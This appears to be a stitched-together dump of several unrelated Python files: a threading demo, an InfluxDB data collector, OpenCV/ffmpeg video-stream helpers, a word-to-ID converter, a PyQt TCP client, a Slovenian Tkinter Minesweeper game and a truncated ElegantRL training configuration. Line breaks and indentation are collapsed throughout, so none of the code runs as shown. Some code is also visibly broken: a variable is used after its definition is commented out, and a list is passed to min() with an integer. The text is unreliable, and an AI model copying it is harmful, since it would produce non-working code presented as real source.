import logging import threading import time def worker(arg, i): while not arg['stop']: logging.debug('Hi from myfunc {0}'.format(i)) time.sleep(0.5) def main(): logging.basicConfig(level=logging.DEBUG, format='%(relativeCreated)6d %(threadName)s %(message)s') #info = {'stop': False} for i in range(2): thread = threading.Thread(target=worker, args=(info, i,)) thread.start() while True: try: logging.debug('Hello from main') time.sleep(0.75) except KeyboardInterrupt: info['stop'] = True break thread.join() if __name__ == '__main__': main()
main.py
import asyncio import logging import os import threading from time import sleep from unittest.mock import MagicMock from dotenv import load_dotenv from Collectors.EdgeOS.Collector import EdgeOSCollector from Collectors.Environment.Collector import EnvironmentCollector from DB.InfluxDBCloud import InfluxDBCloud _loop = None def schedule_background(coro): global _loop if _loop is None: _loop = asyncio.new_event_loop() threading.Thread(target=_loop.run_forever, daemon=True).start() _loop.call_soon_threadsafe(asyncio.create_task, coro) if __name__ == '__main__': load_dotenv("../settings.env") influx_url = os.environ.get('INFLUX_URL') influx_token = os.environ.get('INFLUX_TOKEN') influx_org = os.environ.get('INFLUX_ORG') influx_bucket = os.environ.get('INFLUX_BUCKET') logging.basicConfig(format='%(asctime)s:%(levelname)s:%(name)s:%(message)s') logger = logging.getLogger() if os.environ.get("DEBUG_MODE"): logger.setLevel(logging.DEBUG) else: logger.setLevel(logging.INFO) with InfluxDBCloud(influx_url, influx_bucket, influx_token, influx_org) as db_writer: if os.environ.get("NO_DB_WRITE"): db_writer.write = MagicMock(side_effect=lambda x: logging.info("Suppressed DB Write")) eosc = EdgeOSCollector(db_writer) eosc.register_collector() envc = EnvironmentCollector(db_writer) envc.register_collector() schedule_background(eosc.start()) schedule_background(envc.start()) while True: sleep(1)
app_utils.py
# From http://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/ import struct import six import collections import cv2 import datetime import subprocess as sp import json import numpy import time from threading import Thread from matplotlib import colors class FPS: def __init__(self): # store the start time, end time, and total number of frames # that were examined between the start and end intervals self._start = None self._end = None self._numFrames = 0 def start(self): # start the timer self._start = datetime.datetime.now() return self def stop(self): # stop the timer self._end = datetime.datetime.now() def update(self): # increment the total number of frames examined during the # start and end intervals self._numFrames += 1 def elapsed(self): # return the total number of seconds between the start and # end interval return (self._end - self._start).total_seconds() def fps(self): # compute the (approximate) frames per second return self._numFrames / self.elapsed() class HLSVideoStream: def __init__(self, src): # initialize the video camera stream and read the first frame # from the stream # initialize the variable used to indicate if the thread should # be stopped self.stopped = False FFMPEG_BIN = "ffmpeg" metadata = {} while "streams" not in metadata.keys(): print('ERROR: Could not access stream. Trying again.') info = sp.Popen(["ffprobe", "-v", "quiet", "-print_format", "json", "-show_format", "-show_streams", src], stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.PIPE) out, err = info.communicate(b"ffprobe -v quiet -print_format json -show_format -show_streams http://52.91.28.88:8080/hls/live.m3u8") metadata = json.loads(out.decode('utf-8')) time.sleep(5) print('SUCCESS: Retrieved stream metadata.') self.WIDTH = metadata["streams"][0]["width"] self.HEIGHT = metadata["streams"][0]["height"] self.pipe = sp.Popen([ FFMPEG_BIN, "-i", src, "-loglevel", "quiet", # no text output "-an", # disable audio "-f", "image2pipe", "-pix_fmt", "bgr24", "-vcodec", "rawvideo", "-"], stdin = sp.PIPE, stdout = sp.PIPE) print('WIDTH: ', self.WIDTH) raw_image = self.pipe.stdout.read(self.WIDTH*self.HEIGHT*3) # read 432*240*3 bytes (= 1 frame) self.frame = numpy.fromstring(raw_image, dtype='uint8').reshape((self.HEIGHT,self.WIDTH,3)) self.grabbed = self.frame is not None def start(self): # start the thread to read frames from the video stream Thread(target=self.update, args=()).start() return self def update(self): # keep looping infinitely until the thread is stopped # if the thread indicator variable is set, stop the thread while True: if self.stopped: return raw_image = self.pipe.stdout.read(self.WIDTH*self.HEIGHT*3) # read 432*240*3 bytes (= 1 frame) self.frame = numpy.fromstring(raw_image, dtype='uint8').reshape((self.HEIGHT,self.WIDTH,3)) self.grabbed = self.frame is not None def read(self): # return the frame most recently read return self.frame def stop(self): # indicate that the thread should be stopped self.stopped = True class WebcamVideoStream: def __init__(self, src, width, height): # initialize the video camera stream and read the first frame # from the stream self.stream = cv2.VideoCapture(src) self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width) self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height) (self.grabbed, self.frame) = self.stream.read() # initialize the variable used to indicate if the thread should # be stopped self.stopped = False def start(self): # start the thread to read frames from the video stream Thread(target=self.update, args=()).start() return self def update(self): # keep looping infinitely until the thread is stopped while True: # if the thread indicator variable is set, stop the thread if self.stopped: return # otherwise, read the next frame from the stream (self.grabbed, self.frame) = self.stream.read() def read(self): # return the frame most recently read return self.frame def stop(self): # indicate that the thread should be stopped self.stopped = True def standard_colors(): colors = [ 'AliceBlue', 'Chartreuse', 'Aqua', 'Aquamarine', 'Azure', 'Beige', 'Bisque', 'BlanchedAlmond', 'BlueViolet', 'BurlyWood', 'CadetBlue', 'AntiqueWhite', 'Chocolate', 'Coral', 'CornflowerBlue', 'Cornsilk', 'Crimson', 'Cyan', 'DarkCyan', 'DarkGoldenRod', 'DarkGrey', 'DarkKhaki', 'DarkOrange', 'DarkOrchid', 'DarkSalmon', 'DarkSeaGreen', 'DarkTurquoise', 'DarkViolet', 'DeepPink', 'DeepSkyBlue', 'DodgerBlue', 'FireBrick', 'FloralWhite', 'ForestGreen', 'Fuchsia', 'Gainsboro', 'GhostWhite', 'Gold', 'GoldenRod', 'Salmon', 'Tan', 'HoneyDew', 'HotPink', 'IndianRed', 'Ivory', 'Khaki', 'Lavender', 'LavenderBlush', 'LawnGreen', 'LemonChiffon', 'LightBlue', 'LightCoral', 'LightCyan', 'LightGoldenRodYellow', 'LightGray', 'LightGrey', 'LightGreen', 'LightPink', 'LightSalmon', 'LightSeaGreen', 'LightSkyBlue', 'LightSlateGray', 'LightSlateGrey', 'LightSteelBlue', 'LightYellow', 'Lime', 'LimeGreen', 'Linen', 'Magenta', 'MediumAquaMarine', 'MediumOrchid', 'MediumPurple', 'MediumSeaGreen', 'MediumSlateBlue', 'MediumSpringGreen', 'MediumTurquoise', 'MediumVioletRed', 'MintCream', 'MistyRose', 'Moccasin', 'NavajoWhite', 'OldLace', 'Olive', 'OliveDrab', 'Orange', 'OrangeRed', 'Orchid', 'PaleGoldenRod', 'PaleGreen', 'PaleTurquoise', 'PaleVioletRed', 'PapayaWhip', 'PeachPuff', 'Peru', 'Pink', 'Plum', 'PowderBlue', 'Purple', 'Red', 'RosyBrown', 'RoyalBlue', 'SaddleBrown', 'Green', 'SandyBrown', 'SeaGreen', 'SeaShell', 'Sienna', 'Silver', 'SkyBlue', 'SlateBlue', 'SlateGray', 'SlateGrey', 'Snow', 'SpringGreen', 'SteelBlue', 'GreenYellow', 'Teal', 'Thistle', 'Tomato', 'Turquoise', 'Violet', 'Wheat', 'White', 'WhiteSmoke', 'Yellow', 'YellowGreen' ] return colors def color_name_to_rgb(): colors_rgb = [] for key, value in colors.cnames.items(): colors_rgb.append((key, struct.unpack('BBB', bytes.fromhex(value.replace('#', ''))))) return dict(colors_rgb) def draw_boxes_and_labels( boxes, classes, scores, category_index, instance_masks=None, keypoints=None, max_boxes_to_draw=20, min_score_thresh=.5, agnostic_mode=False): """Returns boxes coordinates, class names and colors Args: boxes: a numpy array of shape [N, 4] classes: a numpy array of shape [N] scores: a numpy array of shape [N] or None. If scores=None, then this function assumes that the boxes to be plotted are groundtruth boxes and plot all boxes as black with no classes or scores. category_index: a dict containing category dictionaries (each holding category index `id` and category name `name`) keyed by category indices. instance_masks: a numpy array of shape [N, image_height, image_width], can be None keypoints: a numpy array of shape [N, num_keypoints, 2], can be None max_boxes_to_draw: maximum number of boxes to visualize. If None, draw all boxes. min_score_thresh: minimum score threshold for a box to be visualized agnostic_mode: boolean (default: False) controlling whether to evaluate in class-agnostic mode or not. This mode will display scores but ignore classes. """ # Create a display string (and color) for every box location, group any boxes # that correspond to the same location. box_to_display_str_map = collections.defaultdict(list) box_to_color_map = collections.defaultdict(str) box_to_instance_masks_map = {} box_to_keypoints_map = collections.defaultdict(list) if not max_boxes_to_draw: max_boxes_to_draw = boxes.shape[0] for i in range(min(max_boxes_to_draw, boxes.shape[0])): if scores is None or scores[i] > min_score_thresh: box = tuple(boxes[i].tolist()) if instance_masks is not None: box_to_instance_masks_map[box] = instance_masks[i] if keypoints is not None: box_to_keypoints_map[box].extend(keypoints[i]) if scores is None: box_to_color_map[box] = 'black' else: if not agnostic_mode: if classes[i] in category_index.keys(): class_name = category_index[classes[i]]['name'] else: class_name = 'N/A' display_str = '{}: {}%'.format( class_name, int(100 * scores[i])) else: display_str = 'score: {}%'.format(int(100 * scores[i])) box_to_display_str_map[box].append(display_str) if agnostic_mode: box_to_color_map[box] = 'DarkOrange' else: box_to_color_map[box] = standard_colors()[ classes[i] % len(standard_colors())] # Store all the coordinates of the boxes, class names and colors color_rgb = color_name_to_rgb() rect_points = [] class_names = [] class_colors = [] for box, color in six.iteritems(box_to_color_map): ymin, xmin, ymax, xmax = box rect_points.append(dict(ymin=ymin, xmin=xmin, ymax=ymax, xmax=xmax)) class_names.append(box_to_display_str_map[box]) class_colors.append(color_rgb[color.lower()]) return rect_points, class_names, class_colors
words2ids.py
from utils.vector_manager import VectorManager from time import time import multiprocessing as mp import argparse import numpy as np import os import sys def word2Id(filename, w2id, debug=False): if debug: print("Translating %s" % filename) unk_id = 0 file_out = "%s_num" % filename.split("_clean")[0] def transform_numpy(): """ Transforms a 4D list of words into a 4D numpy array of integers and writes it into file_out """ docs = VectorManager.parse_into_4D(VectorManager.read_vector(filename)) file_list = [] for doc in docs: doc_list = [] for paragraph in doc: par_list = [] for sentence in paragraph: s_id = [toId(word) for word in sentence if word] if s_id: par_list.append(s_id) doc_list.append(par_list) file_list.append(doc_list) np.save(file_out, np.array(file_list)) def transform(): """ Transforms a 4D list of words into a 4D numpy array of integers and writes it into file_out """ with open(filename) as f: data = f.read().decode("latin-1").split() ids = " ".join([str(w2id[w]) for w in data]) with open("%s_num_eos" % filename, "wb") as f: f.write(ids) def toId(word): """ Return ID of the word (or 0 if word is not in word2Id dict) :param word: to translated :return: Id of the word """ word_id = unk_id try: word_id = w2id[word] except KeyError: pass finally: return word_id transform() # return transform() class FileW2ID(object): """ Auxiliar class which holds the filepaths and w2id structure and yields them one at a time in order to avoid replicating the w2id structure (which can be quite big) """ def __init__(self, filepaths, w2id): self.filepaths = filepaths self.w2id = w2id def __iter__(self): for file in self.filepaths: yield (file, self.w2id) def translate_files(data_path, w2id, suffix="_clean", debug=False): """ Handles the parallel translation from word to id of the files in data_path with the mapping w2id :param data_path: path of the files to transform. Used to be called from either main or as block of the pipeline :param w2id: mappings to be used """ print("[BLOCK] Translating files from %s" % (data_path)) filepaths = [] for root, dirs, files in os.walk(data_path): filepaths.extend(["%s/%s" % (root, file) for file in files if file.endswith(suffix)]) threads = min(mp.cpu_count() * 4, filepaths) print("[BLOCK] Starting %s processes to translate to IDs %s files" % (threads, len(filepaths))) i = 0 while i < len(filepaths): ps = [] j = 0 while j < threads and (i + j) < len(filepaths): if debug: print("[%s] Creating %s of %s for file %s" % ( i, i + j, len(filepaths), filepaths[i + j])) p = (mp.Process(target=word2Id, args=(filepaths[i + j], w2id,))) p.start() ps.append(p) j += 1 if debug: print("%s process in the list to join" % len(ps)) j = 0 while j < threads and (i + j) < len(filepaths): if debug: print("[%s] Joining %s of %s for file %s" % ( i, j, len(filepaths), filepaths[i + j])) ps[j].join() j += 1 i += j # for p in iter_file_w2id: # word2Id(p) # p = mp.Pool(threads, maxtasksperchild=1) # p.map(word2Id, iter_file_w2id) print("[BLOCK] Files translated to IDs") sys.stdout.flush() if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-d', '--data', type=str, help="Path of the data to be translated with word2id vector." " and clean up.", required=True) parser.add_argument('-w', '--word_vector', type=str, help="Word2ID vector to be used for doc translation.", required=False, default="../models/eos/word2id_1000.pklz") args = parser.parse_args() data_path = args.data word2id_file = args.word_vector begin = time() w2Id = VectorManager.read_vector(word2id_file) translate_files(data_path, w2Id) end = time() print("Total processing time: %d seconds" % (end - begin))
testTcpLogic.py
from PyQt5 import QtWidgets import testTcpUi import socket import threading import json import sys #import stopThreading class TcpLogic(testTcpUi.ToolsUi): def __init__(self, num): super(TcpLogic, self).__init__(num) self.tcp_socket = None self.sever_th = None self.client_th = None self.client_socket_list = list() self.link = False # 用于标记是否开启了连接 def tcp_client_start(self): """ 功能函数,TCP客户端连接其他服务端的方法 :return: """ self.tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) address = ('127.0.0.1', 9999) try: self.tcp_socket.connect(address) except Exception: self.signal_connect_error.emit() return -1 else: self.client_th = threading.Thread( target=self.tcp_client_concurrency, args=(address,)) self.client_th.start() def tcp_client_concurrency(self, address): while True: recv_msg = self.tcp_socket.recv(1024) if recv_msg: msg = json.loads(recv_msg.decode('utf-8')) if msg[0] == 'question': print('msg==question') self.signal_write_question.emit(msg) elif msg[0] == 'pass' or msg[0] == 'fail': print('msg==pass or fail') self.signal_question_end.emit(msg) elif msg[0] == 'profession error': print('msg==profession error') self.signal_profession_error.emit() elif msg[0] == 'profession ok': print('msg==profession ok') self.signal_ui_change.emit() elif msg[0] == 'confirm': print('msg==confirm') self.signal_write_msg.emit(str(msg[1])) else: self.tcp_socket.close() break def tcp_send(self, msg): print(msg) self.tcp_socket.send(msg.encode('utf-8')) if __name__ == '__main__': app = QtWidgets.QApplication(sys.argv) ui = TcpLogic(1) ui.show() sys.exit(app.exec_())
minolovec.py
from tkinter import * from tkinter import messagebox from PIL import Image, ImageTk from polje import * import racunalnik import random import threading # array barv za stevilke na polju BARVE = {1: '#8B00FF', 2: '#4B0082', 3: '#0000FF', 4: '#20A106', 5: '#F2CB1D', 6: '#FF7F00', 7: '#FF0000', 8: '#000000', 9: '#000000'} class Minesweeper(): def __init__(self, master, velikost, mine): self.velikost = velikost # velikost kvadratnega igralnega polja self.kvadratek = 30 # velikost enega kvadratka na igralnem polju self.mine = mine # stevilo min self.polje = [[Polje(j, i) for i in range(self.velikost)] for j in range(self.velikost)] self.preostale_mine = IntVar(value=self.mine) self.zmage = IntVar(0) self.porazi = IntVar(0) self.gameactive = True # ali igra poteka self.odprta_polja = [] # vsa trenutno odprta polja self.zaprta_polja = [(i, j) for i in range(self.velikost) for j in range(self.velikost)] # vsa trenutno zaprta # polja self.zastave = [] # vsa polja, ki so trenutno oznacena z zastavico # --- INTELIGENCA --- self.vlakno = None self.inteligenca = None self.p = None # poteza self.pomoc = True # ali igralec zeli pomoc racunalnika ali ne self.zakasnitev = 30 # zakasnitev risanja potez racunalnika # --- GUI --- self.master = master # da ga lahko kasneje unicimo self.ozadje = '#BABABA' # barva ozadja polj zastava = Image.open('flag_small.png') self.zastava = ImageTk.PhotoImage(zastava) # nalozimo sliko zastave bomba = Image.open('bomb_small.png') self.bomba = ImageTk.PhotoImage(bomba) # nalozimo sliko mine self.nastavitve = None # okno z nastavitvami self.maxvelikost = 30 # maksimalna velikost, ki jo bo uporabnik lahko izbral pri nastavitvah self.izbrana_velikost = None # velikost, ki jo je uporabnik izbral self.izbrane_mine = None # stevilo min, ki jih bo uporabnik izbral self.izbran_igralec = None # ali bo uporabnik izbral resevanje s pomocjo racunalnika master.title('Minolovec') okvir = Frame(master) okvir.grid() menu = Menu(master) master.config(menu=menu) podmenu = Menu(menu) podmenu.add_command(label='Nova igra [F1]', command=self.nova_igra) podmenu.add_command(label='Nastavitve [F2]', command=self.okno_z_nastavitvami) podmenu.add_separator() podmenu.add_command(label='Izhod [Esc]', command=self.izhod) menu.add_cascade(label='File', menu=podmenu) Label(okvir, text='Zmage: ').grid(row=0, column=0) Label(okvir, textvariable=self.zmage).grid(row=0, column=1, sticky='W') Label(okvir, text='Porazi: ').grid(row=1, column=0) Label(okvir, textvariable=self.porazi).grid(row=1, column=1, sticky='W') Label(okvir, text='Preostale mine: ').grid(row=2, column=0, sticky='S') Label(okvir, textvariable=self.preostale_mine).grid(row=2, column=1, sticky='WS') self.poteza_racunalnika = Button(okvir, text='Namig', command=self.prepusti_racunalniku) self.poteza_racunalnika.grid(row=0, column=2, rowspan=3) self.platno = Canvas(okvir, width=self.velikost*self.kvadratek, height=self.velikost*self.kvadratek, background='#FFFFFF', bd=1, highlightthickness=1, highlightbackground='#000000') self.platno.grid(row=3, column=0, columnspan=3) self.narisi_mrezo() self.platno.bind("<Button-1>", self.klik) self.platno.bind("<Button-3>", self.klik) master.bind("<F1>", self.nova_igra) master.bind("<F2>", self.okno_z_nastavitvami) master.bind("<Escape>", self.izhod) self.okno_z_nastavitvami() # *********************** # PRIPRAVA IGRE # *********************** def spremeni_stevilko_polj(self, x, y): """ Spremeni stevilko polj okoli mine, ta je podana s koordinatami x in y. """ for z in range(max(0, x-1), min(x+2, self.velikost)): for w in range(max(0, y-1), min(y+2, self.velikost)): if self.polje[z][w].vrednost != 'x': self.polje[z][w].vrednost += 1 def napolni(self): """ Nakljucno napolni igralno polje s 'self.mine' stevilom min. Mine so oznacene z x, prazni kvadratki z 0. """ i = self.mine prazno = [(x, y) for x in range(self.velikost) for y in range(self.velikost)] while i > 0: (x, y) = random.choice(prazno) prazno.remove((x, y)) self.polje[x][y].vrednost = 'x' self.spremeni_stevilko_polj(x, y) i -= 1 def nova_igra(self, *args): """ Resetira vse spremenljivke in pripravi novo igro. """ if self.vlakno is not None: self.vlakno.join() self.polje = [[Polje(j, i) for i in range(self.velikost)] for j in range(self.velikost)] self.napolni() self.preostale_mine.set(self.mine) self.platno.delete(ALL) self.platno.config(width=self.velikost*self.kvadratek, height=self.velikost*self.kvadratek) self.narisi_mrezo() self.gameactive = True self.zaprta_polja = [(i, j) for i in range(self.velikost) for j in range(self.velikost)] self.odprta_polja = [] self.zastave = [] # self.prikazi_celotno_polje(True) # prikazovanje celotnega polja za debugiranje if self.pomoc: self.platno.after(self.zakasnitev, self.prepusti_racunalniku) # *********************** # NASTAVITEV IGRE # *********************** def ponastavi(self, *args): """ Ponastavi parametre igre glede na podatke, vnešene v okno z nastavitvami. Klice se ob kliku na gumb 'V redu' ali ob pritisku na <Enter> znotraj okna z nastavitvami. """ try: m = int(self.izbrane_mine.get()) v = int(self.izbrana_velikost.get()) if m > v ** 2: messagebox.showerror('Nepravilno število min', 'Vnešeno število min je večje od površine polja!') self.nastavitve.focus() self.izbrana_velikost.focus() elif v > self.maxvelikost: messagebox.showerror('Prevelika velikost polja', 'Prosim, vnesite velikost med 1 in {0}!'.format( self.maxvelikost)) self.nastavitve.focus() self.izbrana_velikost.focus() else: self.velikost = v self.mine = m self.pomoc = True if self.izbran_igralec.get() else False if self.pomoc: self.poteza_racunalnika.grid_remove() else: self.poteza_racunalnika.grid() self.nastavitve.destroy() self.gameactive = True self.nova_igra() except ValueError: messagebox.showerror('Nepravilna vrednost', 'Vnesli ste nepravilno vrednost!') self.nastavitve.focus() self.izbrana_velikost.focus() def posodobi_max_stevilo_min(self): """ Glede na vneseno velikost polja posodobi zgornjo mejo za stevilo min v oknu za nastavitve. """ velikost = int(self.izbrana_velikost.get()) self.izbrane_mine.config(to=velikost**2) def okno_z_nastavitvami(self, *args): """ Odpre okno z nastavitvami. """ self.nastavitve = Toplevel() self.nastavitve.title('Nastavitve') self.nastavitve.transient(self.master) # poskrbi, da je okno z nastavitvami vedno nad glavnim oknom self.nastavitve.focus() self.gameactive = False trenutna_velikost = StringVar() trenutna_velikost.set(self.velikost) Label(self.nastavitve, text='Velikost polja: ').grid(row=0, column=0, sticky='W') self.izbrana_velikost = Spinbox(self.nastavitve, from_=2, to=self.maxvelikost, textvariable=trenutna_velikost, command=self.posodobi_max_stevilo_min) self.izbrana_velikost.grid(row=0, column=1) self.izbrana_velikost.focus() trenutne_mine = StringVar() trenutne_mine.set(self.mine) Label(self.nastavitve, text='Število min: ').grid(row=1, column=0, sticky='W') self.izbrane_mine = Spinbox(self.nastavitve, from_=1, to=int(self.izbrana_velikost.get())**2, textvariable=trenutne_mine) self.izbrane_mine.grid(row=1, column=1) self.izbran_igralec = IntVar() self.izbran_igralec.set(1 if self.pomoc else 0) Checkbutton(self.nastavitve, text='Igro naj rešuje računalnik', var=self.izbran_igralec).grid(row=2, column=0, columnspan=2) Button(self.nastavitve, text='V redu', command=self.ponastavi).grid(row=3, column=1) self.nastavitve.bind("<Return>", self.ponastavi) def izhod(self, *args): """ Poskrbi za unicenje threada in glavnega okna ob izhodu iz igre. """ if self.vlakno is not None: self.vlakno.join() self.master.destroy() # *********************** # MEHANIZEM IGRE # *********************** def poteza(self, p): """ Sprejme potezo p in jo izvede. """ (x, y, m) = p if self.gameactive: if m: # če je m True, je uporabnik kliknil z desno tipko, torej oznacimo polje z zastavo ozn = self.polje[x][y].oznaci() if ozn: # polje smo uspesno oznacili self.narisi_mino(x, y) mine = self.preostale_mine.get() if (x, y) in self.zastave: self.zastave.remove((x, y)) self.zaprta_polja.append((x, y)) self.preostale_mine.set(mine + 1) else: self.zaprta_polja.remove((x, y)) self.zastave.append((x, y)) self.preostale_mine.set(mine - 1) self.preveri() else: # sicer polje odpremo if not self.polje[x][y].flagged: self.odpri_blok((x, y)) self.preveri() if self.gameactive and self.pomoc: self.platno.after(self.zakasnitev, self.prepusti_racunalniku) # ce igro resuje racunalnik, # potem ponovno poklicemo metodo, ki od racunalnika pridobi novo potezo def odpri_blok(self, koord): """ Sprejme tuple koord s koordinatami, kamor je uporabnik levo-kliknil (kjer je prazno polje), in odpre vsa sosednja polja, ce je stevilo min v okolici polja 0. Postopek ponavlja za vsako polje, ki se odpre, dokler ne naleti na polje, ki ima v okolici kaksno mino. """ checked = [koord] odpri = [koord] while odpri: x, y = odpri.pop() odpr = self.polje[x][y].odpri() if odpr: self.narisi_polje(x, y) if self.polje[x][y].prikaz == 'x': self.preveri(mina=True) break self.zaprta_polja.remove((x, y)) self.odprta_polja.append((x, y)) checked.append((x, y)) if self.polje[x][y].vrednost == 0: for i in range(max(0, x - 1), min(x + 2, self.velikost)): for j in range(max(0, y - 1), min(y + 2, self.velikost)): if not self.polje[i][j].odprto and not (i, j) in checked: odpri.append((i, j)) def polno(self): """ Preveri, ali je igralno polje zapolnjeno. """ if self.zaprta_polja: return False return True def preveri(self, mina=False): """ Preveri, ali je igre konec. Neobvezen parameter mina pove, ali je bila metoda poklicana, ker je igralec stopil na mino. """ polno = self.polno() if mina: self.gameactive = False self.porazi.set(self.porazi.get() + 1) elif polno and self.preostale_mine.get() == 0: # polje je pravilno izpolnjeno self.gameactive = False self.zmage.set(self.zmage.get() + 1) # *********************** # INPUT # *********************** def klik(self, klik): """ Metoda, ki je bindana na levi in desni klik miske. Ce igra poteka, naredi potezo glede na to, ali je uporabnik kliknil levo ali desno tipko. """ if self.gameactive and not self.pomoc: # uporabnik lahko klikne, ce igra poteka in ce je ne resuje racunalnik y = klik.x // self.kvadratek x = klik.y // self.kvadratek if x < self.velikost and y < self.velikost: # uporabnik je kliknil znotraj polja flag = True if klik.num == 3 else False # ali je uporabnik kliknil z desno ali levo tipko miske self.poteza((x, y, flag)) # *********************** # RISANJE # *********************** def narisi_mrezo(self): """ Narise mrezo na Canvasu. """ for i in range(1, self.velikost): self.platno.create_line(i * self.kvadratek, 0, i * self.kvadratek, self.velikost * self.kvadratek) self.platno.create_line(0, i * self.kvadratek, self.velikost * self.kvadratek, i * self.kvadratek) def narisi_polje(self, x, y): """ Narise kvadratek s stevilko. """ kvad = self.izracunaj_kvadratek(x, y) self.platno.create_rectangle(*kvad, fill=self.ozadje) stevilka = self.polje[x][y].vrednost sredina = self.izracunaj_sredino_kvadratka(x, y) if stevilka == 'x': self.platno.create_rectangle(*kvad, fill='#FF0000') self.platno.create_image(sredina, image=self.bomba) elif stevilka != 0: barva = BARVE[stevilka] self.platno.create_text(sredina, text=stevilka, font=('Arial', 14, 'bold'), fill=barva) def narisi_mino(self, x, y): """ Ali narise ali zbrise zastavico na polje. """ flag = self.polje[x][y].flagged # polje smo ze oznacili/odznacili, treba ga je samo se narisat sredina = self.izracunaj_sredino_kvadratka(x, y) if flag: kvad = self.izracunaj_kvadratek(x, y) self.platno.create_rectangle(*kvad, fill='#FF9696', width=1, outline='#000000') self.platno.create_image(sredina, image=self.zastava) else: tag = self.najdi_id(x, y) for t in tag: self.platno.delete(t) self.platno.delete(self.platno.find_closest(*sredina)) # ------ POMOZNE FUNKCIJE ZA RISANJE ------ def izracunaj_kvadratek(self, x, y): """ Izracuna tocki v levem zgornjem kotu in desnem spodnjem kotu kvadratka, ki se nahaja v vrstici x in stolpcu y. """ return [y * self.kvadratek, x * self.kvadratek, (y + 1) * self.kvadratek, (x + 1) * self.kvadratek] def izracunaj_sredino_kvadratka(self, x, y): """ Izracuna koordinate tocke na sredini kvadratka. """ return y * self.kvadratek + (self.kvadratek // 2), x * self.kvadratek + (self.kvadratek // 2) def najdi_id(self, x, y): """ Najde id vseh elementov na Canvasu znotraj kvadratka na koordinati x, y. """ kvad = self.izracunaj_kvadratek(x, y) return self.platno.find_enclosed(*kvad) # *********************** # SPREMLJANJE IGRE # *********************** def naredi_matriko(self): """ Naredi matriko, ki prikazuje trenutno stanje na polju. """ matrika = [['' for _ in range(self.velikost)] for _ in range(self.velikost)] for r in self.polje: for k in r: matrika[k.x][k.y] = k.prikaz return matrika # *********************** # INTELIGENCA # *********************** def prepusti_racunalniku(self): """ Pozene vzporedni thread, kjer racunalnik racuna potezo. """ if self.gameactive: self.p = None if self.inteligenca is None: self.inteligenca = racunalnik.Racunalnik() self.vlakno = threading.Thread(target=self.razmisljaj) self.vlakno.start() self.platno.after(self.zakasnitev, self.konec_razmisljanja) def razmisljaj(self): """ Racunalnik izracuna naslednjo potezo, ki se spravi v atribut p. """ m = self.naredi_matriko() p = self.inteligenca.vrni_potezo(m, int(self.preostale_mine.get())) self.p = p self.vlakno = None def konec_razmisljanja(self): """ Preveri, ali je racunalnik ze izracunal potezo. """ if self.p is None: # racunalnik se ni izracunal poteze self.platno.after(self.zakasnitev, self.konec_razmisljanja) else: # racunalnik je ze izracunal potezo self.poteza(self.p) # naredimo potezo self.p = None # *********************** # POMOZNE FUNKCIJE # *********************** def prikazi_celotno_polje(self, odkrito=False): """ Prikaze celotno polje min in praznih kvadratkov. """ niz = '' for x in self.polje: niz += '|' for y in x: n = y.vrednost if odkrito else str(y) niz += ' {0} |'.format(n) niz += '\n' print(niz) root = Tk() igrica = Minesweeper(root, 10, 20) root.mainloop()
run.py
import os import sys import time import torch import numpy as np import numpy.random as rd import multiprocessing as mp from elegantrl.env import build_env, build_eval_env from elegantrl.replay import ReplayBuffer, ReplayBufferMP from elegantrl.evaluator import Evaluator """[ElegantRL.2021.10.21](https://github.com/AI4Finance-LLC/ElegantRL)""" class Arguments: # [ElegantRL.2021.10.21] def __init__(self, env, agent): self.env = env # the environment for training self.env_num = getattr(env, 'env_num', 1) # env_num = 1. In vector env, env_num > 1. self.max_step = getattr(env, 'max_step', None) # the max step of an episode self.state_dim = getattr(env, 'state_dim', None) # vector dimension (feature number) of state self.action_dim = getattr(env, 'action_dim', None) # vector dimension (feature number) of action self.if_discrete = getattr(env, 'if_discrete', None) # discrete or continuous action space self.target_return = getattr(env, 'target_return', None) # target average episode return self.agent = agent # Deep Reinforcement Learning algorithm self.if_off_policy = agent.if_off_policy # agent is on-policy or off-policy if self.if_off_policy: # off-policy self.net_dim = 2 ** 8 # the network width self.max_memo = 2 ** 21 # capacity of replay buffer self.batch_size = self.net_dim # num of transitions sampled from replay buffer. self.target_step = 2 ** 10 # repeatedly update network to keep critic's loss small self.repeat_times = 2 ** 0 # collect target_step, then update network self.if_per_or_gae = False # use PER (Prioritized Experience Replay) for sparse reward else: # on-policy self.net_dim = 2 ** 9 # the network width self.max_memo = 2 ** 12 # capacity of replay buffer self.batch_size = self.net_dim * 2 # num of transitions sampled from replay buffer. self.target_step = self.max_memo # repeatedly update network to keep critic's loss small self.repeat_times = 2 ** 3 # collect target_step, then update network self.if_per_or_gae = False # use PER: GAE (Generalized Advantage Estimation) for sparse reward '''Arguments for training''' self.gamma = 0.99 # discount factor of future rewards self.reward_scale = 2 ** 0 # an approximate target reward usually be closed to 256 self.learning_rate = 2 ** -15 # 2 ** -14 ~= 3e-5 self.soft_update_tau = 2 ** -8 # 2 ** -8 ~= 5e-3 '''Arguments for device''' self.worker_num = 2 # rollout workers number pre GPU (adjust it to get high GPU usage) self.thread_num = 8 # cpu_num for evaluate model, torch.set_num_threads(self.num_threads) self.random_seed = 0 # initialize random seed in self.init_before_training() self.learner_gpus = (0,) # for example: os.environ['CUDA_VISIBLE_DEVICES'] = '0, 2,' self.workers_gpus = self.learner_gpus # for isaac gym '''Arguments for evaluate and save''' self.cwd = None # the directory path to save the model self.if_remove = True # remove the cwd folder? (True, False, None:ask me) self.break_step = +np.inf # break training after 'total_step > break_step' self.if_allow_break = True # allow break training when reach goal (early termination) self.eval_env = None # the environment for evaluating. None means set automatically. self.eval_gap = 2 ** 8 # evaluate the agent per eval_gap seconds self.eval_times1 = 2 ** 2 # number of times that get episode return in first self.eval_times2 = 2 ** 4 # number of times that get episode return in second self.eval_gpu_id = None # -1 means use cpu, >=0 means use GPU, None means set as learner_gpus[0] self.if_overwrite = False # Save policy networks with different episode return or overwrite def init_before_training(self): np.random.seed(self.random_seed) torch.manual_seed(self.random_seed) torch.set_num_threads(self.thread_num) torch.set_default_dtype(torch.float32) '''env''' assert isinstance(self.env_num, int) assert isinstance(self.max_step, int) assert isinstance(self.state_dim, int) or isinstance(self.state_dim, tuple) assert isinstance(self.action_dim, int) assert isinstance(self.if_discrete, bool) assert 